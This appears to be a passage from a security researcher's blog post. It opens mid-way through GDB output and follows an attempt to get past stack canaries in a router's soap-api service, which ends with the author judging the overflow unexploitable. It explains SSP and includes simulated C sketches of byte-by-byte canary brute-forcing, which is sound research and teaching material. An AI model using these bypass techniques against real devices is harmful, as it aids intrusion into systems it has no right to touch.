r10 0xbe88e3a4 3196642212
r11 0xb6f316fc 3069384444
r12 0xb6f2bc6c 3069361260
sp 0xbe88e388 0xbe88e388
lr 0xb6eb2aa8 -1226102104
pc 0xb69aee40 0xb69aee40 <__stack_chk_fail>
cpsr 0x80000010 -2147483632
0x0: <error: Cannot access memory at address 0x0>
0xb6f01b65: ""
0x42424242: <error: Cannot access memory at address 0x42424242>
0x5719b01e: <error: Cannot access memory at address 0x5719b01e>
stack canary bypass, question mark?
So, after weeks (months?) of poking at this bug on and off and eventually giving up, I’d come back and managed to get back to square one: a buffer overflow that was triggering the stack check fail and crashing the application. Naturally, the next step was to explore ways to get past the stack canary and see if I could get a working exploit going. I’ve only ever dealt with stack canaries in toy examples so this would be my first time trying against a real target and having to do it with the limited debugging environment only made things more difficult.
a primer on SSP
The Stack Smashing Protector (SSP) is a compiler feature specifically designed to detect stack-based buffer overflows and abort the program if one is detected, to mitigate the potential effects of the memory corruption. There are various implementations of this feature, but they all follow a similar design: at the start of a function, the compiler inserts code that copies a value from a global variable into a local variable (the canary), and at the end of the function, before it returns, code that checks that this value still matches the one saved in the global variable. If the values do not match, the program is immediately terminated to prevent further execution that could result in undefined behavior. The canary is usually inserted into the stack in such a way that it sits immediately before the return address at the edge of the current function’s stack frame. This means a buffer overflow that has corrupted the return address would also have corrupted the canary value, which would result in the canary check failing and the program being aborted before the function returns and attempts to use the corrupted return address.
For GCC’s -fstack-protector, for example:
This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.
It’s important to note one thing: this protection does not prevent overflows from happening. It’s only meant to detect them and mitigate classic stack overflow exploitation. This means that any code that executes after the overflow has occurred, but before the canary is checked at the end of the function, could be affected by the memory corruption. Modern implementations do a few things to mitigate this as well, such as reordering variable declarations to move non-buffer variables ‘above’ overflow-able buffers so that they cannot be (easily) corrupted, and placing all buffers together in memory right before the canary and return address, which limits the scope of data that can be corrupted and increases the likelihood of an overflow overwriting the canary value.
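The check the compiler inserts can be approximated by hand. The sketch below is a simulation under stated assumptions, not what GCC actually emits: the buffer and canary live in one explicit struct so the "overflow" stays within defined behaviour, and the names fake_frame, copy_and_check, and GUARD_VALUE are made up for illustration.

```c
#include <stddef.h>
#include <string.h>

#define GUARD_VALUE 0x00313373UL   /* stand-in for the global guard value */

/* A buffer followed by a canary, laid out explicitly in one object so the
 * "overflow" below stays within defined behaviour. */
struct fake_frame {
    char buf[16];
    unsigned long canary;
};

/*
 * Copy `len` bytes of input into the frame, starting at buf, the way an
 * unchecked copy would. Returns 0 if the canary is intact afterwards and
 * -1 if it was clobbered (where a real program would call
 * __stack_chk_fail()). `input` must point to at least `len` readable bytes.
 */
int copy_and_check(const void *input, size_t len)
{
    struct fake_frame frame;

    frame.canary = GUARD_VALUE;             /* "prologue": place the canary */
    memset(frame.buf, 0, sizeof(frame.buf));

    if (len > sizeof(frame))
        len = sizeof(frame);                /* keep the demo inside the struct */
    memcpy(&frame, input, len);             /* the "overflow" happens here */

    return frame.canary == GUARD_VALUE ? 0 : -1;   /* "epilogue": verify */
}
```

Copying 16 bytes of 'A' leaves the canary alone, while 17 or more bytes change it and trip the check. Note that the copy itself still happened in full by the time the check runs, which is the point made above: the canary detects the overflow, it does not prevent it.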
Another important point is that the canary value is set once, when the process starts, so it remains the same for the entire lifetime of the application, including in any children it forks. New processes started via the shell or execve() will have unique canaries.
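A rough way to see the fork half of this on a Linux box: the kernel hands every exec'd process 16 random bytes through the `AT_RANDOM` auxiliary vector entry, and glibc (for one) derives the userspace canary from them. Whether the Orbi's libc does exactly the same is an assumption on my part. The sketch below only checks that a forked child sees the same seed bytes as its parent; `seed_survives_fork()` is a hypothetical helper name.

```c
#include <string.h>
#include <sys/auxv.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if a forked child sees the same AT_RANDOM bytes as its parent,
 * 0 if they differ, -1 on error. */
int seed_survives_fork(void)
{
    const unsigned char *seed = (const unsigned char *)getauxval(AT_RANDOM);
    unsigned char child_seed[16];
    int fds[2];
    pid_t pid;
    ssize_t n;

    if (seed == NULL || pipe(fds) != 0)
        return -1;

    pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {
        /* Child: report the seed bytes it sees, then exit without exec. */
        const unsigned char *mine = (const unsigned char *)getauxval(AT_RANDOM);
        close(fds[0]);
        _exit(write(fds[1], mine, 16) == 16 ? 0 : 1);
    }

    /* Parent: read the child's view of the seed and compare. */
    close(fds[1]);
    n = read(fds[0], child_seed, sizeof child_seed);
    close(fds[0]);
    waitpid(pid, NULL, 0);
    if (n != (ssize_t)sizeof child_seed)
        return -1;
    return memcmp(seed, child_seed, sizeof child_seed) == 0;
}
```

The child never calls execve(), so it keeps a copy of the parent's memory, seed included. A process started through execve() gets a fresh set of `AT_RANDOM` bytes from the kernel instead.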
I took a look at arch/arm/include/asm/stackprotector.h in the kernel sources for the kernel used by the device (a custom fork of 3.14.77) and found this code, showing that on ARM architectures the canary is initialized by XORing random bytes against the value of LINUX_VERSION_CODE:
static __always_inline void boot_init_stack_canary(void)
{
    unsigned long canary;

    /* Try to get a semi random initial value. */
    get_random_bytes(&canary, sizeof(canary));
    canary ^= LINUX_VERSION_CODE;

    current->stack_canary = canary;
    __stack_chk_guard = current->stack_canary;
}
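For a feel of what that XOR does, here is a small userspace sketch of the same arithmetic. The `DEMO_` names are mine; the packing mirrors the `KERNEL_VERSION(a, b, c)` macro as it is defined in kernels of this era, and `random_word` is a stand-in for whatever get_random_bytes() would return.

```c
#include <stdint.h>

/* Same packing as the kernel's KERNEL_VERSION() macro in 3.x kernels. */
#define DEMO_KERNEL_VERSION(a, b, c) (((a) << 16) + ((b) << 8) + (c))

/* 3.14.77, the version mentioned above, packs to 0x030e4d. */
#define DEMO_VERSION_CODE DEMO_KERNEL_VERSION(3, 14, 77)

/* random_word stands in for the output of get_random_bytes(). */
uint32_t demo_make_canary(uint32_t random_word)
{
    return random_word ^ (uint32_t)DEMO_VERSION_CODE;
}
```

XORing with a fixed constant is reversible, so it neither adds nor removes randomness: the canary is exactly as unpredictable as the random word that went in.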
bruteforcing? I guess…not
Generally speaking, there are two ways of going about bypassing the canary check:
- Use a separate memory leak vulnerability to leak the canary value so that it can be correctly overwritten
- Bruteforce the canary byte-by-byte (only works under certain conditions)
Since I hadn’t found any ways to leak memory, the only real option I would have is bruteforcing. There’s a specific bruteforcing technique that greatly reduces the total number of attempts needed to determine the canary value: guess one byte at a time, use the lack of a crash as an oracle to tell when the correct byte has been guessed, and repeat this for each byte of the canary. As mentioned above, this only works under certain conditions: the program must keep the same canary between payloads (i.e. fork-and-accept servers) and the code that reads the payload must not append a NULL byte (e.g. read / recv). I found a few good resources that helped me better understand this concept, such as this LiveOverflow video and this CTF guide (screenshot below taken from here).
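The byte-by-byte idea can be sketched against a simulated target. This is a toy model, not anything that talks to the router: `overwrite_survives()` plays the role of "send a payload and see whether the process crashed", the secret canary bytes are made up, and the `append_nul` flag models a reader that adds a terminating NULL byte after the payload.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CANARY_LEN 4   /* 32-bit target assumed */

/* Oracle: overwrite the first n canary bytes with guess (plus an optional
 * trailing NULL byte) and report whether the canary check would still pass. */
int overwrite_survives(const uint8_t secret[CANARY_LEN], const uint8_t *guess,
                       size_t n, int append_nul)
{
    uint8_t local[CANARY_LEN + 1];   /* spare byte keeps the NULL in bounds */

    assert(n <= CANARY_LEN);
    memcpy(local, secret, CANARY_LEN);
    local[CANARY_LEN] = 0;
    memcpy(local, guess, n);
    if (append_nul)
        local[n] = 0;
    return memcmp(local, secret, CANARY_LEN) == 0;
}

/* Recovers the canary one byte at a time. Returns the number of attempts
 * used, or -1 if some byte position never produced a surviving guess. */
long brute_force_canary(const uint8_t secret[CANARY_LEN],
                        uint8_t out[CANARY_LEN], int append_nul)
{
    long attempts = 0;

    for (size_t i = 0; i < CANARY_LEN; i++) {
        int found = 0;
        for (int b = 0; b < 256 && !found; b++) {
            out[i] = (uint8_t)b;
            attempts++;
            found = overwrite_survives(secret, out, i + 1, append_nul);
        }
        if (!found)
            return -1;
    }
    return attempts;
}
```

With a stable canary and no appended NULL, the worst case is 4 × 256 = 1024 attempts instead of 2^32. With `append_nul` set, every guess also zeroes the byte after it, so the oracle never reports success unless that next byte happens to be 00, and the search fails at the first position.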
Seems easy enough, right? I went back to the device and determined the minimum length to overflow the buffer and trigger the stack check fail was 209 characters. After sending only a couple of requests and watching the values in the debugger I quickly realized this wasn’t going to work at all.
The output below shows the debugger breaking at the start of __stack_chk_fail() with r2 containing the local copy of the stack canary, of which a single byte has been overwritten, and r3 containing the original. As you can see, the byte that was written was 00 (NULL): the function that reads the payload into the buffer (sscanf()) appends a NULL. So the no-appended-NULL condition for this to be viable is out.
Thread 2.1 "soap-api" hit Breakpoint 2, 0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
#0 0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
No symbol table info available.
Backtrace stopped: Cannot access memory at address 0x4f532f34
Stack level 0, frame at 0xbecd34c8:
pc = 0xb698be40 in __stack_chk_fail; saved pc = 0xb6e8faa8
Outermost frame: Cannot access memory at address 0x4f532f34
Arglist at 0xbecd34c8, args:
Locals at 0xbecd34c8, Previous frame's sp is 0xbecd34c8
r0 0x0 0
r1 0xb6edeb65 3069045605
r2 0xb710d200 3071332864
r3 0xb710d29e 3071333022
r4 0x0 0
r5 0xb6a16214 3064029716
r6 0xb6f08b80 3069217664
r7 0xbecd360c 3201119756
r8 0xbecd354c 3201119564
r9 0xbecd350c 3201119500
r10 0xbecd34e4 3201119460
r11 0xb6f0e6fc 3069241084
r12 0xb6f08c6c 3069217900
sp 0xbecd34c8 0xbecd34c8
lr 0xb6e8faa8 -1226245464
pc 0xb698be40 0xb698be40 <__stack_chk_fail>
cpsr 0x80000010 -2147483632
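The 00 in the low byte of r2 is what you would expect from any `%s`-style sscanf() conversion, which always writes a terminating NULL byte after the characters it stores. Here is a small sketch of that effect; the struct layout, the canary bytes (taken from r3 above, in little-endian order) and the helper name are all assumptions for illustration, and the real buffer in soap-api is of course much larger than 8 bytes.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Toy frame: an 8-byte buffer followed directly by a 4-byte canary. */
struct scan_frame {
    char buf[8];
    unsigned char canary[4];
};

/* Scans input with an unbounded %s, then returns the first canary byte,
 * or -1 if the input is unusable. Inputs are capped at 11 characters so
 * the demo never writes outside the struct. */
int first_canary_byte_after_scan(const char *input)
{
    static const unsigned char original[4] = { 0x9e, 0xd2, 0x10, 0xb7 };
    struct scan_frame frame;

    if (strlen(input) > sizeof frame - 1)
        return -1;
    memset(frame.buf, 0, sizeof frame.buf);
    memcpy(frame.canary, original, sizeof original);

    /* No field width on %s: sscanf stores the token plus a NULL byte. */
    if (sscanf(input, "%s", (char *)&frame) != 1)
        return -1;
    return frame.canary[0];
}
```

Seven characters leave the canary untouched, eight characters fill the buffer and push the terminator onto the first canary byte (turning 9e into 00, as in the register dump), and nine characters put an attacker byte there but zero the next one.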
Not only that, the canary value was changing between requests. In retrospect, this is obvious, since soap-api is not forking itself to handle the requests but is instead being execve()’ed at some point after lighttpd forks.
So, yeah: (smarter) bruteforcing was out of the question. Since I’d also learned along the way that PIE and RELRO were enabled on the binary, I called it quits at this point, and I feel pretty confident in saying this isn’t an exploitable issue.
conclusion
This turned out to be a long journey that gave me a chance to become more familiar with some of the internals of this system. It also forced me to get creative in finding ways to debug and test things out, which taught me some new tricks. In the end, I was able to definitively confirm the buffer overflow could be reached, but the mitigations in place combined with the nuances of the environment proved to be enough to thwart my exploitation attempts.
Alas, this is the life of security research — sometimes, even when you’ve found the bug, there’s still no guarantee you’ll be able to exploit it.
references
- Stack Canaries – Gingerly Sidestepping the Cage [2021]
- LiveOverflow video
- CTF guide on stack canaries
- Bruteforcing x86 Stack Canaries